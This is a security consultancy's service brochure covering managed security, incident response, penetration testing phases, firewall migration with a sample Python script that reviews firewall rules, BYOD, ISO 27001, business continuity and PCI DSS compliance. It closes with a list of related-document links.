Benefits of Engaging an MSS Provider
Cost
“The cost of a managed security service is typically less
than hiring in-house, full-time security experts.”
(Wilbanks, 2001).
Staffing
“A shortage of qualified information security personnel
puts tremendous pressure on IT departments to recruit,
train, compensate, and retain critical staff.” (Hulme, 2001)
An MSSP transfers this responsibility. In addition, “if a
client organization can outsource repetitive security
monitoring and protection functions, then they can focus
internal resources on more critical business initiatives”
(Pescatore 2001).
Skills
“MSSPs have insight into security situations based on
extensive experience, dealing with hundreds or thousands
of potentially threatening situations every day, and are
some of the most aggressive and strenuous users of
security software.” (Navarro 2001 & DeJesus 2001)
“In-house staff members who only deal with security on a
part-time basis may only see a limited number of security
incidents.” (Hulme, 2001)
Facilities
“MSSPs can also enhance security simply because of the
facilities they offer.” (DeJesus, 2001). These are physically
hardened sites with state-of-the-art infrastructure
managed by trained personnel.
Objectivity and Independence
An MSSP can provide an independent and objective
perspective on the security posture of an organization. An
in-house team often cannot be objective and certainly is
not independent.
Security Awareness
“It is difficult for an in-house team to track and address
all potential threats and vulnerabilities as well as attack
patterns, intruder tools, and best security practices.” (Alner
2001, Navarro 2001)
Whereas ….
An MSSP is often able to obtain advance warning of new
vulnerabilities and gain early access to information on
countermeasures.
Service Performance
The MSSP service can report near real-time results,
24 hours a day, 7 days a week, and 365 days a year,
guaranteed against an SLA. This is a large contrast with
an in-house service that may only operate during normal
business hours.
Service Security and Technology
“Service security solutions and technologies such as
firewalls, intrusion detection systems (IDSs), virtual private
networks (VPNs) and vulnerability assessment tools are far
more effective because they are managed and monitored
by skilled security professionals.” (Wilbanks, 2001)
Benefits of Engaging an MSS Provider
[Figure: MSSP benefits summary covering cost, staffing, skills, facilities, independence, security awareness and service. Headline figures claimed: 27% recurring annual saving; 94% initial cost saving; 200+ dedicated security professionals; 360° view of global threats; built for big data; 20% technology but 80% interpretation; SLA of a 15-minute alert for high-priority events]
The Business Case for Managed Security Services
[Figure: Malware sophistication vs time, 1998–2013. Milestones shown: C&C comms over the standard IRC port; C&C comms over non-standard IRC ports; C&C comms over HTTP/HTTPS; C&C using social media (Twitter, Facebook); C&C comms over P2P; automated DDoS; 0-day threats now commonplace; fast-flux DNS now widespread; new wave of DLL hijacking; first major cyber warfare attack; Mydoom & Sasser, record for most damage; the rise in nation-state malware; Flame, the most sophisticated malware yet]
CSIRT skills & experience
Si follows the best industry standards and guidelines for
incident response.
The increasing sophistication and impact of malware
attacks emphasises the need for companies to retain the
services of a professional CSIRT team.
Our CSIRT engineers are highly experienced and maintain a
tool kit of skills including:
•	 Vulnerability management
•	 Penetration testing
•	 Botnets
•	 Sandbox
•	 Honeypot
•	 Forensic analysis
Why hire a professional CSIRT?
The inability of companies to prepare for cyber-attacks from incredibly resourceful criminals is one of the most pressing issues facing global chief executives. The increasing sophistication of attacks, which leaves even the most technology-savvy organizations vulnerable, means that few organizations have the means to employ staff able to respond effectively. We offer an incident response service that lets our customers’ organizations benefit from our skills and experience.
Rapid Response CSIRT Services
•	 Incident Response
•	 Reverse Engineering/Analysis
•	 Advanced Threat Alerting
•	 Forensics
•	 Malware Analysis
•	 Assessments & Audits
•	 Script Development
•	 Remediation and Recovery
Si CSIRT Teams
Si has been running a Computer Security Incident Response Team (CSIRT) for many years. Through the development of our
own SOC and our clients’ SOCs our staff are some of the most qualified and experienced incident response engineers in the
market place.
Si CSIRT Lab
Through the development of our own SOC, our CSIRT lab
comprises an extensive library of incident case files that
are key for supporting analysis and mitigation measures.
The very fact that Si has SOCs around the world, gives our
CSIRT teams a unique insight into a wide range of threats
and risks, enabling us to react faster to such incidents. Each
member of the team has access not only to the labs, but to
this global resource.
CSIRT Services
We offer our professional services to enterprise, telecom
and government organisations on a cost effective basis.
The available options for procuring these services include:
•	 Staff secondment
•	 Retainer leased rapid response teams
•	 Remote CSIRT teams
The security incident management team
activities include:
[Figure 5: CERT/CC Incident Handling Life Cycle. Inputs: email information request, vulnerability report, incident report, hotline/helpdesk call centre, IDS, other. Activities: triage; analyze; obtain contact information; coordinate information & response; provide technical assistance; resolution]
“Eighty percent of the intrusions of your networks today can be
handled by patches, anti-virus and user actions. We spend 90
percent of our time on the 80 percent of the issues that could be
handled by good hygiene.”
Brigadier General Paul Nakasone, Deputy Commander, U.S. Army Cyber Command
Si’s Professional Security Services provides enterprise-wide assessments, design and deployment services to build secure and
resilient IT infrastructures.
Our delivery model is based on industry best practices and technologies that are aligned to our clients’ IT infrastructure and
business processes. Our services create a foundation that enables our clients to address key risk management and compliance
challenges.
•	 Vulnerability Assessments
•	 Penetration Testing
•	 Web Application Security Testing
•	 Network Risk Assessments
•	 Network Architecture Reviews
•	 Device Configuration and Migration Reviews
•	 Cyber Forensics
According to Davos World Economic Forum, 2013, (the
Global Agenda Survey), “Cyber Risks” were ranked as the
3rd largest underestimated risk to world development
ahead of sovereign debt, education and protectionism.
[Figure: Penetration testing methodology]
•	 Information gathering: active & passive reconnaissance
•	 Target discovery: finalizing the scope
•	 Scanning & fingerprinting: identifying underlying technology & services
•	 Local segregation of targets: grouping targets based on attack vectors
	- Applications: web servers, database servers, mail servers, SSH, FTP
	- Operating systems: Windows, Linux, Unix & Solaris
	- Web-based applications: e-commerce, B2B, custom websites & appliances
	- Perimeter devices: network & security appliances
•	 Vulnerability identification: locating known & unknown vulnerabilities
•	 Vulnerability analysis: filtering & confirming attack methods
•	 Penetration / exploitation: confirming existing vulnerabilities
•	 Impact analysis: extent of business impact due to vulnerability exploitation
•	 Data correlation
•	 Mitigation strategies
•	 Reports: detailed findings, management report, executive summary
Features of our Vulnerability Assessment and Penetration Testing services include:
•	 A robust policy template to enable security configuration compliance
•	 Compliance-based reports (PCI, HIPAA, GLBA, FISMA and SOX)
•	 Customisable, multi-view reports that make the most of existing security investments
•	 Audit-ready reporting and certified technical support teams
•	 Internal and external vulnerability scans
•	 Best practices (ITIL, OSSTMM and the ISO 27001 security standard)
•	 Instant access to Secure-I security intelligence and research
•	 Executive summaries (jargon-free, true executive-level summaries)
•	 Priority matrices indicating remediation priorities and risks
•	 Detailed impact analysis of the identified vulnerabilities
•	 Findings and recommendations to improve security posture
•	 Knowledge transfer to the client’s IT teams
Vulnerability Assessments
Si’s Vulnerability Assessment (VA) service provides our clients with the ability to identify and mitigate security gaps associated
with their IT assets, thereby enhancing their overall security posture.
Our assessments meet the mandatory compliance requirements and provide a proactive measure to stay one step ahead of
threats.
Penetration Testing
Interconnected corporate networks of partners, clients, remote offices, wireless LANs, vendors and the Internet have created
multiple avenues for an attacker to target companies. Organisations face greater risks to customer data, intellectual property
and financial records.
CIOs and CFOs must have a clear understanding of risks and vulnerabilities to protect their organizations from external
attacks.
Our Vulnerability Assessment provides:
•	 On-demand, proactive vulnerability management for organisations
•	 Visibility, awareness and consistency across our clients’ estates
•	 Tracking of asset ownership, pinpointing of rogue devices, and detailed asset discovery and profile reporting
•	 Reduced investment in tools and technology
•	 Comprehensive remediation solutions and complete remediation procedures to mitigate identified vulnerabilities
Our Penetration Testing services enable our
clients to:
•	 Identify existing and potential vulnerabilities and
risks from external attacks
•	 Utilise experienced security analysts with the
specialized skills and tools needed to mitigate client
risk
•	 Conduct testing in a safe and controlled environment
without compromising routine business activities
•	 Reduce investment associated with employing full
time security analysts, tools and technologies
•	 Integrate with an overall risk management solution to address the audit requirements of policy and compliance frameworks such as ISO 27001, SOX, HIPAA and PCI DSS
VULNERABILITY ASSESSMENTS | PENETRATION TESTING
Features include:
•	 Comprehensive documentation and presentation of findings
•	 A prioritised list of remediation steps
•	 Practical recommendations focusing on both the risk and the cost associated with it
•	 Action plan, short and long term, to achieve compliance and business objectives
•	 Identification of technical and logical vulnerabilities such as SQL injection, cross-site scripting, I/O data validation and exception management
•	 Ability to determine remediation steps and counter-measures
•	 Detailed technical information report covering the nature of the defect, the code locations, the impact of the defect and the remediation solutions
Web Application Security Testing
Web applications let our clients’ customers access personal and confidential information directly, encouraging a self-service model and reducing costs.
Critical business functions depend on the correct functioning of these applications. The steep rise in vulnerabilities found in web applications has a significant impact on our clients’ enterprises and on the privacy of end users. Business losses can include loss of data, damage to public image and loss of confidence.
Network Risk Assessments
A thorough evaluation of network security posture is mandatory to enable our clients to answer the following fundamental
questions:
Our Web Application Security Testing allows our
clients to:
•	 Get instant feedback and catch hidden bugs before
launch
•	 Create higher quality applications as they are tested
by certified QA experts
•	 Deploy applications faster by testing throughout the
development process
•	 Use global testing coverage by testing across
operating systems, browsers, languages and more
•	 Allow our clients to gain a better understanding of
potential website vulnerabilities that may be visible
from the Internet
•	 What is their enterprise security strategy? And what
can be done to protect it in a better way?
•	 Where are the weaknesses in their security policies
and architecture?
•	 How can they make security data actionable and
get timely compliance reports to address audit
requirements?
•	 How much does an effective risk management
solution cost?
Our Network Risk Assessment includes:
•	 A Security Policy Audit – evaluating security policies
based on availability, business continuity and
compliance requirements; it also establishes key risk
factors and security metrics
•	 A Technical Security Evaluation – analyzing the
security architecture in the context of security
policies and control objectives to uncover
vulnerabilities
•	 A Threat Management Assessment – examining
threat identification, investigation and incident
response processes
•	 Disaster Recovery & Business Continuity Planning – to ensure that plans for returning systems to operational standards are in place
WEB APPLICATION SECURITY TESTING | NETWORK RISK ASSESSMENTS
Black Box Testing: we perform attack testing assuming the identity of an external attacker/hacker, with no inside information about the application.
Grey Box Testing: we receive basic information about the design & function of the web app; grey box testing is a fusion of black & white box testing.
White Box Testing: we receive complete information on the code, infrastructure and architecture, and perform a full source code & infrastructure review.
Firewall Migration Services | Network Architecture Review
Firewall Migration Services
A firewall platform typically has a service life of 5 to 7 years, and upgrades are usually initiated by organizational growth and changing security requirements. A firewall is a critical item of network security infrastructure, and any change of technology carries risks to business continuity.
Si’s professional services team assists organizations with everything from applying a standard methodology to executing the firewall migration. Every migration project is unique and presents its own challenges; the key to our success is treating each case with the same level of care and professionalism.
Firewall Migration Road Map
Phases: Baseline Assessment, Requirements, Planning, Migrate
Step 1: FW Architecture Assessment. Analysis of firewall logs, VPNs, installed software / patch level, bugs fixed in new versions, and utilisation of hardware components.
Step 2: FW Health Check & Performance Review. Review of hard disk capacity and usage, CPU and memory usage, network interface throughput, capacity and availability; analysis of logs, errors and syslog; review of the firewall configuration.
Step 3: FW Policy & Compliance Review. Review of violations of corporate policy and of industry standards and best practices; firewall rule review & optimisation.
Step 4: FW Module & Protection Level Assessment. Review of the protection level achievable with the current architecture; recommendation of upgrades and additional modules.
Step 5: Migration Config & Validate. Lab-based configuration & validation prior to roll-out and cut-over.
Step 6: Migration Cut-Over & Monitoring. On site: traffic migrated from old to new; troubleshoot; monitor; handover & training.
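The policy & compliance review in step 3 is where rule optimisation happens. As an added example (not Si's tooling; the vendor-neutral rule model, the first-match assumption and the sample ruleset and hit counters are constructed for this page), the script below checks a ruleset for rules shadowed by an earlier opposite-action rule, rules redundant with an earlier same-action rule, rules with zero hits according to counters derived from firewall logs, and any/any permits:

```python
"""First-match firewall policy review: shadowed, redundant, unused and
any/any rules.

Added example for the policy & compliance review step above; it is not Si's
tooling. It assumes a vendor-neutral rule model (action, source CIDR,
destination CIDR, protocol, inclusive port range) evaluated in first-match
order; address groups, zones, negation and IPv6 are deliberately out of scope.
"""
from dataclasses import dataclass
from ipaddress import ip_network


@dataclass(frozen=True)
class Rule:
    name: str
    action: str      # "permit" or "deny"
    src: str         # source CIDR
    dst: str         # destination CIDR
    proto: str       # "tcp", "udp", "icmp" or "any"
    ports: tuple     # (low, high) inclusive; (0, 65535) means any port


ANY_PORTS = (0, 65535)


def covers(outer, inner):
    """True when every packet matched by `inner` is also matched by `outer`."""
    return (
        ip_network(inner.src).subnet_of(ip_network(outer.src))
        and ip_network(inner.dst).subnet_of(ip_network(outer.dst))
        and outer.proto in ("any", inner.proto)
        and outer.ports[0] <= inner.ports[0]
        and outer.ports[1] >= inner.ports[1]
    )


def is_any_any_permit(rule):
    """A permit with no source, destination, protocol or port restriction."""
    return (
        rule.action == "permit"
        and ip_network(rule.src).prefixlen == 0
        and ip_network(rule.dst).prefixlen == 0
        and rule.proto == "any"
        and rule.ports == ANY_PORTS
    )


def review_policy(rules, hit_counts=None):
    """Return (rule_name, finding, detail) tuples in rule order.

    shadowed  : an earlier rule with the opposite action matches everything
                this rule matches, so this rule can never fire.
    redundant : an earlier rule with the same action already covers it.
    unused    : zero hits in the supplied log-derived counters.
    """
    findings = []
    for i, rule in enumerate(rules):
        for earlier in rules[:i]:
            if covers(earlier, rule):
                kind = "redundant" if earlier.action == rule.action else "shadowed"
                findings.append((rule.name, kind, earlier.name))
                break  # in first-match order the first covering rule is the one that wins
        if is_any_any_permit(rule):
            findings.append((rule.name, "any_any_permit", ""))
        if hit_counts is not None and hit_counts.get(rule.name, 0) == 0:
            findings.append((rule.name, "unused", "0 hits"))
    return findings


# Constructed ruleset and hit counters (not taken from any real firewall).
SAMPLE_RULES = [
    Rule("R1", "permit", "10.0.0.0/8",  "192.168.10.5/32", "tcp", (443, 443)),
    Rule("R2", "deny",   "10.1.0.0/16", "192.168.10.0/24", "any", ANY_PORTS),
    Rule("R3", "permit", "10.1.2.0/24", "192.168.10.5/32", "tcp", (443, 443)),
    Rule("R4", "permit", "10.1.5.0/24", "192.168.10.8/32", "tcp", (22, 22)),
    Rule("R5", "permit", "0.0.0.0/0",   "0.0.0.0/0",       "any", ANY_PORTS),
]
SAMPLE_HITS = {"R1": 120345, "R2": 87, "R3": 0, "R4": 0, "R5": 5}


def sample_review():
    """Run the review over the constructed ruleset."""
    return review_policy(SAMPLE_RULES, SAMPLE_HITS)


if __name__ == "__main__":
    for name, kind, detail in sample_review():
        print(f"{name}: {kind} {detail}".rstrip())
```

Vendor configurations (ASA access lists, Sidewinder policy) would first be normalised into this model. Shadowed and unused rules are the first candidates for removal rather than migration, each confirmed against the log analysis from steps 1 and 2, and an any/any permit should be justified or replaced before cut-over rather than carried across to the new platform.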
•	 We determine security strategies that support our clients’ business objectives
•	 We implement existing policies where required and establish new policies where they are needed
•	 We put in place effective risk mitigation and regulatory compliance
•	 We analyse, manage and report
•	 We review existing policies and frameworks and make recommendations where necessary
•	 We audit existing policies against standards such as ISO 27001 and PCI DSS to ensure compliance
•	 Our aim is to set out a road map detailing short, medium and long term goals
Network Architecture Review
Si utilises its vast experience and knowledge to act as professional assessors with respect to the security architecture of our
clients’ networks.
Our consultants analyze every key aspect of the architecture including:
•	 Logical and physical design
•	 Security technology inventory
•	 Asset inventory
•	 Outbound and inbound connectivity
•	 Security procedures and processes
•	 Network topology
•	 Network and host access controls
•	 Log-in procedures and authentication requirements
•	 Business continuity plans
•	 Containment and incident response procedures
•	 Health of security controls
For each key area, and for the infrastructure as a whole, Si consultants identify and document the following 4 steps:
Step 1: Current state assessment
Step 2: A vision for a future state
Step 3: A gap analysis
Step 4: Recommendations for closing gaps
Case Study: Firewall Migration – Fortune 500 Financial Services Institution (2012)
What are the facts?
•	 A $1.1 million firewall migration project for this client generated a fast payback
•	 The client is an IT managed services provider serving over 11,000 community-based banks, credit unions and insurance agencies. The engagement called for migrating 45 McAfee Sidewinder firewalls to Cisco ASA firewalls
The client decided to change technology following a history of frequent McAfee Sidewinder platform crashes that negatively impacted their end-customer satisfaction. Si began with a proof-of-concept project, migrating one firewall in our lab before the full-scale roll-out.
What did we learn?
The client recovered the cost of the firewall migration project through lower cost of operations, reduced security risks, more efficient administrative and maintenance processes, and ultimately a more satisfied customer base.
[Figure: BYOD considerations]
System wipe: your IT department needs to be able to wipe the system if it believes its security has been compromised.
App security: some applications could compromise the security of your business data, so you'll need an application control system in place to prevent blacklisted apps being downloaded once the device is hooked up to your network.
Management: the IT department needs to select a mobile device management system. Look for one that offers simple user interfaces as well as the security features you need.
Identification: if a wide range of users and devices are to be allowed access to the network, it is critical to identify and authenticate each device and user.
Security: with sensitive information being transmitted, security is top of the list. Allowing BYOD doesn't mean sacrificing security. IT must establish WiFi security and VPN access, and ideally add-on software to protect against malware.
Data waiver: personal and business data can easily be mixed on personal devices, so employers need to protect themselves if it goes wrong. If the device is lost or stolen, employers may need to destroy all data; employees should sign a waiver agreeing to this before being allowed to use their own device.
Bring Your Own Device (BYOD)
When an organization considers implementing a BYOD policy it will generally ask: what sort of Mobile Device Management needs to be implemented? Which systems must employees have mobile access to? What level of security needs to be implemented?
Si provides consulting services to deliver the right solution, enabling our clients to manage and secure their networks and to control the use of mobile applications on personal devices across those networks.
Secure & Manage Mobile Devices with MobileIron
Si partners with MobileIron who offer the platform to
manage mobile apps for business users. The MobileIron
platform provides both the tightest security and best
end-user experience for the distribution, delivery and
management of mobile applications, docs and devices for
global organizations.
Manage the Network
Step 1: High-performance network infrastructure. Your network needs to be able to cope with the influx of personal devices connecting to it.
Step 2: Security. Support the secure connection of devices, whether they are connecting from inside or outside the office.
Step 3: Access. Set policies around which devices may connect to the network, and which network areas they have access to.
Step 4: Acceptable use policy. Develop specific stipulations to govern the use of new technologies such as smartphones and tablets.
Manage the Mobile Device
Step 5: Manage the apps. Control access to the camera, application stores, Internet browser, YouTube, and explicit content.
Step 6: Manage the data. Control access to documents and data shared over the mobile device.
Secure & Manage the Network with ISE
Si has pioneered the implementation of BYOD management through collaboration with Cisco ISE and is one of only 10 worldwide delivery partners. The technology allows:
•	 Consistent enforcement of context-based policies
across wired and wireless networks
•	 System-wide visibility showing who and what is on
the network - wired, wireless, or VPN
•	 Accurate device identification using ISE-based
probes, embedded device sensors, active endpoint
scanning
•	 Greater visibility and control of the endpoint with
Mobile Device Management solution integration*
The eBay Hack, May 2014
It took only a small number of employee log-in details to be compromised for hackers to obtain the entire customer database. As a result 128 million people – equivalent to twice the population of Britain – had to change their passwords!
Si offers a range of compliance services based on industry best practices. Our lead compliance advisors/auditors are leaders in their field and in certain instances are sector specialists in, for example, banking, finance and government.
Services include:
•	 Compliance consulting, implementation and
management
•	 Compliance certification readiness audits
•	 Business continuity planning (BCP)
•	 Security awareness and ITIL training
•	 Compliance services covering:
		 - ISO 27001:2005
		 - ISO 20000
		 - BS 25999
		 - ITIL
		 - COBIT
		 - HIPAA
		 - PCI DSS
		 - SAS 70
		 - SOX
Information Security Management System - ISO 27001
What is ISO 27001?
ISO 27001 is the international standard for information security management systems. It specifies the requirements for such a system and, in its annex, a set of ‘best practice’ controls, enabling our clients’ organizations to demonstrate that best practices are implemented and continually improved.
Information Security Management System
The Information Security Management System (ISMS) provides a control framework to protect information assets. This combines management controls, technical controls, procedural controls & personnel controls, to name a few. The controls combine preventive, detective, restorative, maintenance and monitoring controls.
The Approach for Successful Certification
We typically apply four phases to the successful delivery of
an ISMS process and we can demonstrate proven success
with some of the most successful organizations in the
Fortune 500 index.
What is Business Continuity Planning (BCP) & Management?
Business Continuity Planning & Management “identifies an organization’s exposure to internal & external threats & synthesizes hard & soft assets to provide effective prevention & recovery for the organization, while maintaining competitive advantage & value system integrity” (Elliot, Swartz & Herbane, 1999)
Our Approach to BCP Compliance
BS 25999 is BSI’s standard for Business Continuity Management (BCM) and can be applied to any organization in any location. Si specialises in applying this standard, which includes guidance on the processes, principles and technology recommended for BCM, together with a specification of requirements for implementing, operating and improving a BCM System (BCMS).
4 Key Benefits of ISO 27001 Implementation
1. Compliance
ISO 27001 can provide the methodology to enable an
efficient way to comply with regulations regarding data
protection, security  IT governance.
2. Marketing edge
ISO 27001 can be a unique selling point, especially if
handling clients’ sensitive information.
3. Lowering the expenses
Information security is usually considered as a cost with no
obvious financial gain. However, there is financial gain if
you lower your expenses caused by incidents.
4. Putting your business in order
ISO 27001 is particularly good for putting businesses in
order – it forces organizations to very precisely define both
responsibilities and duties, and therefore strengthens the
internal organization.
BUSINESS CONTINUITY PLANNING (BCP) & MANAGEMENT
Information Security Management System - ISO 27001 | Business Continuity Planning & Management
Annex A of ISO 27001:2005 groups its 133 detailed controls into 11 domains:
•	 Security policy
•	 Organization of information security
•	 Asset management
•	 Human resources security
•	 Physical and environmental security
•	 Communications and operations management
•	 Access control
•	 Information systems acquisition, development & maintenance
•	 Information security incident management
•	 Business continuity management
•	 Compliance
What are we planning for?
•	 Random failure of mission-critical systems
•	 Epidemic
•	 Earthquake
•	 Fire
•	 Flood
•	 Cyber attack
•	 Sabotage (insider or external threat)
•	 Hurricane or other major storm
•	 Utility outage
•	 Terrorism/Piracy
•	 War/civil disorder
•	 Theft (insider or external threat)
[Figure: four-phase ISMS approach. Phase I: Planning; Phase II: Implementation; Phase III; Phase IV: Certification. Activities shown: objectives & policies; gap analysis; risk assessment; risk treatment plan; implement controls; training & awareness; monitor, review & refine; management review; documentation; verification; certification]
[Figure: BCP lifecycle. Stages: Recovery Requirement Analysis, Solution Design, Testing, Maintenance. Activities shown: Business Impact Analysis (BIA); Threat & Risk Analysis (TRA); Impact Assessment; Disaster Recovery Design; Crisis Management – Command Structure; IT Failover Plan; Crisis Command Team call-out; Technical Swing Test; IT Applications Test; Business Process Test; Verify – Tech Solutions; Verify – Recovery Procedures; Training; Process Refresh]
Compliance & Security Skills Training
To complement our compliance consulting services in the fields of ISO 27001, Business Continuity Management (BS 25999) and ITIL, we offer courses that enable our clients to take ownership of their compliance needs.
Our courses are delivered by a combination of in-house trainers and experienced consultants from the UK.
Course owner: Si & Partner (all courses). Duration: 2 days (all courses).
Course Name
1. Implementation and Audit – ISMS - ISO 27001
2. Implementation and Audit – ITSM - ISO 20000
3. Implementation and Audit – BCMS - ISO 22301
4. Internal Auditor - ISO 27001
5. Business Impact Analysis
6. ISO 27005
7. Network Security Assessment
8. Application Security Assessment
9. Business Continuity Management
10. PCI DSS
11. An Integrated Management System
12. Security Operation Centre Design & Delivery
13. SOC & SIRT Optimization
PCI Compliance & Payment Card Industry Security
Si offers a full range of PCI compliance consulting services to satisfy the requirements of the Payment Card Industry Data Security Standard (PCI DSS). Si is a PCI Approved Scanning Vendor (ASV).
What is PCI DSS?
The PCI Data Security Standard (DSS) was developed by the PCI Security Standards Council and is enforced by the payment card brands. It is designed to protect consumers and businesses, and to encourage the global adoption of consistent data security measures. The PCI DSS comprises 12 broad requirements which organizations must meet to maintain compliance.
PCI DSS compliance requires any organization that
transmits, processes, or stores data that contains payment
card information to protect the privacy and confidentiality
of that data. In addition to retailers, the PCI DSS standards
affect financial institutions, healthcare providers,
transportation service providers, the food and hospitality
industry, and payment service providers, among many
others.
Information Security Programme
PCI DSS scopes only the systems that store, process or transmit cardholder data; on its own it does not address an organization’s wider information security. We therefore recommend that, in addition to the requirements of PCI compliance, a strong framework is established to provide a strong information security environment. By focusing on a broader security programme, organizations can mitigate potential data security breaches and cyber attacks, which leads to better service to customers and increased profitability.
PCI DSS Trends
Several trends have accelerated the need for PCI DSS
compliance and payment security. While the payment
card brands have been actively enforcing PCI compliance
for Level 1 merchants the past few years, they are now
enforcing compliance for Level 2 - 4 merchants as well.
Merchants that are non-compliant can face substantial
fines and the threat of having payment card privileges
revoked.
PCI COMPLIANCE & PAYMENT CARD INDUSTRY SECURITY | Compliance & Security Skills Training
Contact Us
UK: 1st Floor, 6 Bevis Marks, London EC3A 7BA. T: +44 (0)7481 804622
UAE: Al Barsha Business Point, Office 501, Al Barsha One, P.O. Box 283996, Dubai, UAE. T: +971 4 354 9535, F: +971 4 354 9536
India: 305/310 Owner’s Industrial Estate, Gabriel Road, Mahim, Mumbai 400016, India. T: +91 22 2445 4725
USA (New York office): 2137 Route-35, 1st Floor, Holmdel, NJ 07733, United States. T: +1 732 444 4404
www.siconsult.com | info@siconsult.com
Global Security Operation Centres: California, USA; New Jersey, USA; Dubai, UAE; Pune, India; London, UK (including a USA co-location data centre and the Global SOC)
Si’s Multi-disciplinary Capabilities:
•	 Information Security
•	 Security Consulting
•	 ICT Consulting
•	 Building Technology
•	 Engineering & Integration Management

Act enhancing access to ca knowledge, information and strengthening collabora...
 
my cv nederland
my cv nederlandmy cv nederland
my cv nederland
 
Apptad presentation
Apptad presentationApptad presentation
Apptad presentation
 
2509- CV2016
2509- CV20162509- CV2016
2509- CV2016
 
LSH Business Eye 12 15
LSH Business Eye 12 15LSH Business Eye 12 15
LSH Business Eye 12 15
 
Lect 4 power system protection
Lect 4  power system protectionLect 4  power system protection
Lect 4 power system protection
 

Similar to Si InfoSecMiddleEastLR0516

Information technology and information security services
Information technology and information security servicesInformation technology and information security services
Information technology and information security servicesDejan Majkic
 
A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...
A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...
A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...Symantec
 
Rapid Deployment Service
Rapid Deployment ServiceRapid Deployment Service
Rapid Deployment ServiceSsgstubbs
 
CYBER-i Corporate Dossier
CYBER-i Corporate Dossier  CYBER-i Corporate Dossier
CYBER-i Corporate Dossier AGC Networks Ltd
 
Partnership to Capture Indonesia ERP Cloud Trend Opportunities
Partnership to Capture Indonesia ERP Cloud Trend OpportunitiesPartnership to Capture Indonesia ERP Cloud Trend Opportunities
Partnership to Capture Indonesia ERP Cloud Trend OpportunitiesSutedjo Tjahjadi
 
CompTIA CySA+ domains and their Weightage.pptx
CompTIA CySA+ domains and their Weightage.pptxCompTIA CySA+ domains and their Weightage.pptx
CompTIA CySA+ domains and their Weightage.pptxInfosectrain3
 
Kmicro Cybersecurity Offerings 2020
Kmicro Cybersecurity Offerings 2020Kmicro Cybersecurity Offerings 2020
Kmicro Cybersecurity Offerings 2020Manuel Guillen
 
Securium Solutions: Empowering Online Certification Training in Cyber Securit...
Securium Solutions: Empowering Online Certification Training in Cyber Securit...Securium Solutions: Empowering Online Certification Training in Cyber Securit...
Securium Solutions: Empowering Online Certification Training in Cyber Securit...Securium Solutions
 
SECURIUM-SOLUTIONS Best VAPT Security Company
SECURIUM-SOLUTIONS Best VAPT Security CompanySECURIUM-SOLUTIONS Best VAPT Security Company
SECURIUM-SOLUTIONS Best VAPT Security Companykeshavsecurium
 
Best Vapt Security Company Securium Solu
Best Vapt Security Company Securium SoluBest Vapt Security Company Securium Solu
Best Vapt Security Company Securium Solukeshavsecurium
 
Ooredoo%20Security%20Managed%20Services
Ooredoo%20Security%20Managed%20ServicesOoredoo%20Security%20Managed%20Services
Ooredoo%20Security%20Managed%20ServicesMuhammad Mudassar
 
Cyber Security and Cloud Security
Cyber Security and Cloud SecurityCyber Security and Cloud Security
Cyber Security and Cloud SecurityIT Governance Ltd
 
Advanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your BusinessAdvanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your BusinessInfopulse
 
Final 2016 cyber captive survey
Final 2016 cyber captive surveyFinal 2016 cyber captive survey
Final 2016 cyber captive surveyGraeme Cross
 
MCGlobalTech Cyber Capability Statement_Final
MCGlobalTech Cyber Capability Statement_FinalMCGlobalTech Cyber Capability Statement_Final
MCGlobalTech Cyber Capability Statement_FinalWilliam McBorrough
 
SecureWorks
SecureWorksSecureWorks
SecureWorksjduhaime
 
How Microsoft Secures its Online Services [WHITEPAPER]
How Microsoft Secures its Online Services [WHITEPAPER]How Microsoft Secures its Online Services [WHITEPAPER]
How Microsoft Secures its Online Services [WHITEPAPER]ukdpe
 
Microservices_Designing_Deploying.pdf
Microservices_Designing_Deploying.pdfMicroservices_Designing_Deploying.pdf
Microservices_Designing_Deploying.pdfHuyHongNguynnh1
 

Similar to Si InfoSecMiddleEastLR0516 (20)

Information technology and information security services
Information technology and information security servicesInformation technology and information security services
Information technology and information security services
 
A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...
A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...
A Symantec Advisory Guide Migrating to Symantec™ Validation and ID Protection...
 
Rapid Deployment Service
Rapid Deployment ServiceRapid Deployment Service
Rapid Deployment Service
 
CYBER-i Corporate Dossier
CYBER-i Corporate Dossier  CYBER-i Corporate Dossier
CYBER-i Corporate Dossier
 
Partnership to Capture Indonesia ERP Cloud Trend Opportunities
Partnership to Capture Indonesia ERP Cloud Trend OpportunitiesPartnership to Capture Indonesia ERP Cloud Trend Opportunities
Partnership to Capture Indonesia ERP Cloud Trend Opportunities
 
CompTIA CySA+ domains and their Weightage.pptx
CompTIA CySA+ domains and their Weightage.pptxCompTIA CySA+ domains and their Weightage.pptx
CompTIA CySA+ domains and their Weightage.pptx
 
Kmicro Cybersecurity Offerings 2020
Kmicro Cybersecurity Offerings 2020Kmicro Cybersecurity Offerings 2020
Kmicro Cybersecurity Offerings 2020
 
Securium Solutions: Empowering Online Certification Training in Cyber Securit...
Securium Solutions: Empowering Online Certification Training in Cyber Securit...Securium Solutions: Empowering Online Certification Training in Cyber Securit...
Securium Solutions: Empowering Online Certification Training in Cyber Securit...
 
Securim Solutions Pvt Ltd
Securim Solutions Pvt LtdSecurim Solutions Pvt Ltd
Securim Solutions Pvt Ltd
 
SECURIUM-SOLUTIONS Best VAPT Security Company
SECURIUM-SOLUTIONS Best VAPT Security CompanySECURIUM-SOLUTIONS Best VAPT Security Company
SECURIUM-SOLUTIONS Best VAPT Security Company
 
Best Vapt Security Company Securium Solu
Best Vapt Security Company Securium SoluBest Vapt Security Company Securium Solu
Best Vapt Security Company Securium Solu
 
Ooredoo%20Security%20Managed%20Services
Ooredoo%20Security%20Managed%20ServicesOoredoo%20Security%20Managed%20Services
Ooredoo%20Security%20Managed%20Services
 
Cyber Security and Cloud Security
Cyber Security and Cloud SecurityCyber Security and Cloud Security
Cyber Security and Cloud Security
 
Vss pcicomus-en
Vss pcicomus-enVss pcicomus-en
Vss pcicomus-en
 
Advanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your BusinessAdvanced IT and Cyber Security for Your Business
Advanced IT and Cyber Security for Your Business
 
